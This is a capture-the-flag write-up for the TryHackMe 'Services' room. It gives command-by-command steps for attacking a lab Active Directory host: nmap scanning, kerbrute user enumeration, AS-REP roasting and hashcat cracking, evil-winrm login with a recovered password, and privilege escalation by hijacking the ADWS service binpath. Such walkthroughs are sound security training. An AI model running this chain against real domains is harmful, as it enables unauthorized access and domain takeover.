"Services" TryHackMe Write‐up - CTF-Walkthroughs/CTF-Walkthroughs-Wiki GitHub Wiki
This is the writeup for the Services CTF challenge on TryHackMe! https://tryhackme.com/room/services
tags: enumerate, hash cracking, exploit, brute-force, kerbrute
Highlight: Enumerating active directory users using kerbrute, capturing a password hash using AS-REP-ROASTING.
First let's kick things off with some classic nmap scans to get a lay of the land. Initial Setup
export IP=10.10.117.221 export myIP=10.13.24.71
sudo nmap -v --min-rate 10000 <Target's IP address> -p- | grep open
We can use standard expressionw to efficiently sort nmap results and grab all of the open ports for a script scan.
cat tmp | sed 's/\// /g' | awk '{print $1}' | tr "\n" ","
We'll follow up now with a full scan:
sudo nmap -v -sVC -oN nmap.txt <Target's IP address> -p <ports>
roasting: smbclient -L //$IP/ smbmap -u 'anonymous' -H $IP
ENUMERATION:
walk the port 80 website. We quickly identify some employee names from the employees listed on the site.
And here is a naming convention, revealed by the contact email:
Using the naming convention from the contact email, we can compile a shortlist now of possible usernames.
Next, we'll move on to active directory username enumeration.
kerbrute userenum --dc $IP -d services.local users.txt
We found some valid users!
AS-REP ROASTING WITH GetNPUsers.py:
GetNPUsers.py -dc-ip $IP -request 'services.local/' -usersfile users.txt -format hashcat
Boom Shack-a-lacka! j.rock hash is revealed!
Use hashcat to crack the hash: `hashcat -m 18200 hash.txt rockyou.txt'
Bingo! We are in business. Let's log in next with evil-winrm with our newly-found creds. j.rock:Serviceworks1
evil-winrm -i $IP -u j.rock -p Serviceworks1
whoami /all
We see that j.rock is in the
Next, let's check services:
services
Our privesc path forward will be binpath hijacking with the ADWS service.
sc.exe config ADWS binpath="net localgroup administrators j.rock /add"
start and stop the service
log out/in
net user administrator hellothisisatest123!
log out and back in with admin
grab the root flag!